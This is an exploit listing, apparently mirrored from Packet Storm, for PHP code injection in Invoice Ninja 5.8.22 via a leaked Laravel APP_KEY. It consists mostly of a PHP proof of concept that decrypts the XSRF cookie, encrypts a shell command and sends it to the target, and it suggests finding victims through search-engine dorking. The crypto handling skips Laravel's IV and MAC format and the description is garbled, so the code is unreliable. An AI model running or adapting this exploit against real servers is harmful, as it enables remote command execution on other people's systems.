Share
## https://sploitus.com/exploit?id=PACKETSTORM:212935
=============================================================================================================================================
    | # Title     : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://invoiceninja.com/                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.
    
       (Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .
    	
    [+] save code as poc.php.
    
    [+] line 85 set target.
    
    [+] Usage = php poc.php
    
    [+] PayLoad :
    
    <?php
    
    // تعريف الدالة التي ستنفذ الأمر
    function execute_command($url, $command, $app_key) {
        $cipher_mode = 'AES-256-CBC';
    
        // إرسال الطلب GET إلى نقطة النهاية
        $response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');
    
        if ($response['code'] != 200) {
            die("لا يوجد استجابة صالحة من الهدف.");
        }
    
        // فك التشفير باستخدام APP_KEY
        $xsrf_token = extract_xsrf_token($response['cookies']);
        if (!$xsrf_token) {
            die("لم يتم العثور على XSRF-TOKEN.");
        }
    
        $decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
        if (!$decrypted_value) {
            die("فك التشفير باستخدام APP_KEY فشل.");
        }
    
        echo "APP_KEY صالح: " . $app_key . "\n";
        echo "القيمة المفكوكة: " . $decrypted_value . "\n";
    
        // تجهيز الحمولة المشفرة
        $payload = base64_encode($command);  // استبدل بـ payload الخاص بك
        $encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);
    
        if (!$encrypted_payload) {
            die("فشل التشفير باستخدام Laravel.");
        }
    
        // تنفيذ الأمر
        send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
    }
    
    // دالة إرسال الطلب
    function send_request($url, $method, $content_type, $endpoint) {
        $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: ' . $content_type
        ]);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);
    
        curl_close($ch);
    
        return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
    }
    
    // دالة استخراج XSRF-TOKEN من الكوكيز
    function extract_xsrf_token($cookies) {
        foreach ($cookies as $cookie) {
            if (strpos($cookie, 'XSRF-TOKEN') !== false) {
                preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
                return $matches[1];
            }
        }
        return null;
    }
    
    // دالة فك التشفير
    function laravel_decrypt($ciphertext, $key, $cipher_mode) {
        // هنا يمكن استخدام خوارزمية AES لفك التشفير
        // استخدم مكتبة OpenSSL في PHP لهذا الغرض
        return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
    }
    
    // دالة التشفير
    function laravel_encrypt($plaintext, $key, $cipher_mode) {
        // استخدم مكتبة OpenSSL في PHP للتشفير
        return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
    }
    
    // استدعاء الوظائف مع القيم المناسبة
    $url = "https://target.com";
    $app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
    $command = "ls -la";  // استبدل بالأمر المطلوب
    execute_command($url, $command, $app_key);
    
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================